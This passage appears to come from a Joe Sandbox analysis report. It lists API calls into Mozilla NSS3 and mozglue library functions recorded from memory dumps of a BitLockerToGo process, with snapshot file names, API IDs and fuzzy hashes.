                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6C97CEBD
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6C97CEF5
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6C97CF4E
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
• Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                                                                                                                    • API String ID: 438689982-4108050209
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CA96C8D
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CA96CA9
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6CA96CC0
                                                                                                                                                                                                                                                                                                                    • SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6CBB8FE0), ref: 6CA96CFE
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
• Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Util$Alloc_Arena$EncodeItem_memset
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 2370200771-0
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6C9B82BC,?,?), ref: 6C9B649B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C98CA10: malloc.MOZGLUE(?), ref: 6C98CA26
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9B64A9
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9AFA80: GetCurrentThreadId.KERNEL32 ref: 6C9AFA8D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9AFA80: AcquireSRWLockExclusive.KERNEL32(6C9FF448), ref: 6C9AFA99
                                                                                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9B653F
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C9B655A
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
• Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3596744550-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 918f7609503181ee6cd6e4662ffb1f86f5bf362fa792a595e5e18de6dcac8d15
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 67ad384c2f63cfd14f4216b578e6e312960a4ee7fc91be9312a5a075e9c25911
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 918f7609503181ee6cd6e4662ffb1f86f5bf362fa792a595e5e18de6dcac8d15
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF3161B5A04705AFD704CF14D88469FBBF4BF99314F10442EE85A97741DB70E919CB92
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PR_MillisecondsToInterval.NSS3(?), ref: 6CB06E36
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB06E57
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB3C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB3C2BF
                                                                                                                                                                                                                                                                                                                    • PR_MillisecondsToInterval.NSS3(?), ref: 6CB06E7D
                                                                                                                                                                                                                                                                                                                    • PR_MillisecondsToInterval.NSS3(?), ref: 6CB06EAA
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: IntervalMilliseconds$ErrorValue
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3163584228-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 653ee00d6b6909d4c6631ed49020a8cbe2d8bda8030db725c1e40b67e74d0c48
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 051e956764533fd6f34cae3790feb6d3a2313546c00628705beece21e612cd26
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 653ee00d6b6909d4c6631ed49020a8cbe2d8bda8030db725c1e40b67e74d0c48
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B2318171710792EEDB145F34DD043AABBA4EB0135AF10063CDC99D6A90EB3069D9CB92
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaMark_Util.NSS3(?), ref: 6CB02E08
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF14C0: TlsGetValue.KERNEL32 ref: 6CAF14E0
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF14C0: EnterCriticalSection.KERNEL32 ref: 6CAF14F5
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF14C0: PR_Unlock.NSS3 ref: 6CAF150D
                                                                                                                                                                                                                                                                                                                    • PORT_NewArena_Util.NSS3(00000400), ref: 6CB02E1C
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6CB02E3B
                                                                                                                                                                                                                                                                                                                    • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CB02E95
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6CA988A4,00000000,00000000), ref: 6CAF1228
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6CAF1238
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6CA988A4,00000000,00000000), ref: 6CAF124B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF1200: PR_CallOnce.NSS3(6CBF2AA4,6CAF12D0,00000000,00000000,00000000,?,6CA988A4,00000000,00000000), ref: 6CAF125D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6CAF126F
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6CAF1280
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6CAF128E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6CAF129A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6CAF12A1
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1441289343-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                                                                                                                                                                                                                                                                                    • Instruction ID: a85e4ed7b4248596375b316110e9c132a52d01bb3a2b6cc4ebfb79dd91d35d52
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB21D4B1E403854BE700CF549D44BAB3B64AF9130CF110269ED185B752F7B2E69C8293
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • CERT_NewCertList.NSS3 ref: 6CABACC2
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA92F00: PORT_NewArena_Util.NSS3(00000800), ref: 6CA92F0A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA92F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CA92F1D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA92AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6CA90A1B,00000000), ref: 6CA92AF0
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA92AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA92B11
                                                                                                                                                                                                                                                                                                                    • CERT_DestroyCertList.NSS3(00000000), ref: 6CABAD5E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD57D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6CA9B41E,00000000,00000000,?,00000000,?,6CA9B41E,00000000,00000000,00000001,?), ref: 6CAD57E0
  • Part of subcall function 6CAD57D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6CAD5843
• CERT_DestroyCertList.NSS3(?), ref: 6CABAD36
  • Part of subcall function 6CA92F50: CERT_DestroyCertificate.NSS3(?), ref: 6CA92F65
  • Part of subcall function 6CA92F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CA92F83
• free.MOZGLUE(?), ref: 6CABAD4F
Memory Dump Source
• Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
• Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
Similarity
• API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
• String ID:
• API String ID: 132756963-0
APIs
• PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6CAEF0AD,6CAEF150,?,6CAEF150,?,?,?), ref: 6CAEECBA
  • Part of subcall function 6CAF0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CA987ED,00000800,6CA8EF74,00000000), ref: 6CAF1000
  • Part of subcall function 6CAF0FF0: PR_NewLock.NSS3(?,00000800,6CA8EF74,00000000), ref: 6CAF1016
  • Part of subcall function 6CAF0FF0: PL_InitArenaPool.NSS3(00000000,security,6CA987ED,00000008,?,00000800,6CA8EF74,00000000), ref: 6CAF102B
• PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6CAEECD1
  • Part of subcall function 6CAF10C0: TlsGetValue.KERNEL32(?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF10F3
  • Part of subcall function 6CAF10C0: EnterCriticalSection.KERNEL32(?,?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF110C
  • Part of subcall function 6CAF10C0: PL_ArenaAllocate.NSS3(?,?,?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF1141
  • Part of subcall function 6CAF10C0: PR_Unlock.NSS3(?,?,?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF1182
  • Part of subcall function 6CAF10C0: TlsGetValue.KERNEL32(?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF119C
• PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6CAEED02
  • Part of subcall function 6CAF10C0: PL_ArenaAllocate.NSS3(?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF116E
• PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6CAEED5A
Memory Dump Source
• Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
• Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
Similarity
• API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
• String ID:
• API String ID: 2957673229-0
APIs
• PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6CB07FFA,?,6CB09767,?,8B7874C0,0000A48E), ref: 6CB1EDD4
• realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6CB07FFA,?,6CB09767,?,8B7874C0,0000A48E), ref: 6CB1EDFD
• PORT_Alloc_Util.NSS3(?,00000000,00000000,6CB07FFA,?,6CB09767,?,8B7874C0,0000A48E), ref: 6CB1EE14
  • Part of subcall function 6CAF0BE0: malloc.MOZGLUE(6CAE8D2D,?,00000000,?), ref: 6CAF0BF8
  • Part of subcall function 6CAF0BE0: TlsGetValue.KERNEL32(6CAE8D2D,?,00000000,?), ref: 6CAF0C15
• memcpy.VCRUNTIME140(?,?,6CB09767,00000000,00000000,6CB07FFA,?,6CB09767,?,8B7874C0,0000A48E), ref: 6CB1EE33
Memory Dump Source
• Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
• Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
Similarity
• API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
• String ID:
• API String ID: 3903481028-0
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C98B4F5
                                                                                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C9FF4B8), ref: 6C98B502
                                                                                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C9FF4B8), ref: 6C98B542
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C98B578
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6CB25F17,?,?,?,?,?,?,?,?,6CB2AAD4), ref: 6CB3AC94
                                                                                                                                                                                                                                                                                                                    • PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6CB25F17,?,?,?,?,?,?,?,?,6CB2AAD4), ref: 6CB3ACA6
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6CB2AAD4), ref: 6CB3ACC0
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6CB2AAD4), ref: 6CB3ACDB
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: free$DestroyFreeK11_Monitor
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6C97F20E,?), ref: 6C9B3DF5
                                                                                                                                                                                                                                                                                                                    • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6C97F20E,00000000,?), ref: 6C9B3DFC
                                                                                                                                                                                                                                                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C9B3E06
                                                                                                                                                                                                                                                                                                                    • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C9B3E0E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9ACC00: GetCurrentProcess.KERNEL32(?,?,6C9731A7), ref: 6C9ACC0D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9ACC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6C9731A7), ref: 6C9ACC16
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PK11_FreeSymKey.NSS3(?,6CB25D40,00000000,?,?,6CB16AC6,6CB2639C), ref: 6CB3AC2D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CADADC0: TlsGetValue.KERNEL32(?,6CABCDBB,?,6CABD079,00000000,00000001), ref: 6CADAE10
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CADADC0: EnterCriticalSection.KERNEL32(?,?,6CABCDBB,?,6CABD079,00000000,00000001), ref: 6CADAE24
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CADADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6CABD079,00000000,00000001), ref: 6CADAE5A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CADADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CABCDBB,?,6CABD079,00000000,00000001), ref: 6CADAE6F
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CADADC0: free.MOZGLUE(85145F8B,?,?,?,?,6CABCDBB,?,6CABD079,00000000,00000001), ref: 6CADAE7F
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CADADC0: TlsGetValue.KERNEL32(?,6CABCDBB,?,6CABD079,00000000,00000001), ref: 6CADAEB1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CADADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CABCDBB,?,6CABD079,00000000,00000001), ref: 6CADAEC9
                                                                                                                                                                                                                                                                                                                    • PK11_FreeSymKey.NSS3(?,6CB25D40,00000000,?,?,6CB16AC6,6CB2639C), ref: 6CB3AC44
                                                                                                                                                                                                                                                                                                                    • SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,6CB25D40,00000000,?,?,6CB16AC6,6CB2639C), ref: 6CB3AC59
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(8CB6FF01,6CB16AC6,6CB2639C,?,?,?,?,?,?,?,?,?,6CB25D40,00000000,?,6CB2AAD4), ref: 6CB3AC62
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1595327144-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 1329be8462e60618d27fa4339b9e110a519a59cf7c211cc7161d3df0f6d5635f
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 7eb3c589e4db47964a3ff0fe6e9b9485135f8074beb13bf234dfce66a4b27df1
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1329be8462e60618d27fa4339b9e110a519a59cf7c211cc7161d3df0f6d5635f
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 810128B56002149BDF10DF55EDC0B467BA8EB88B58F688068E9498F746D735E848CBA2
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
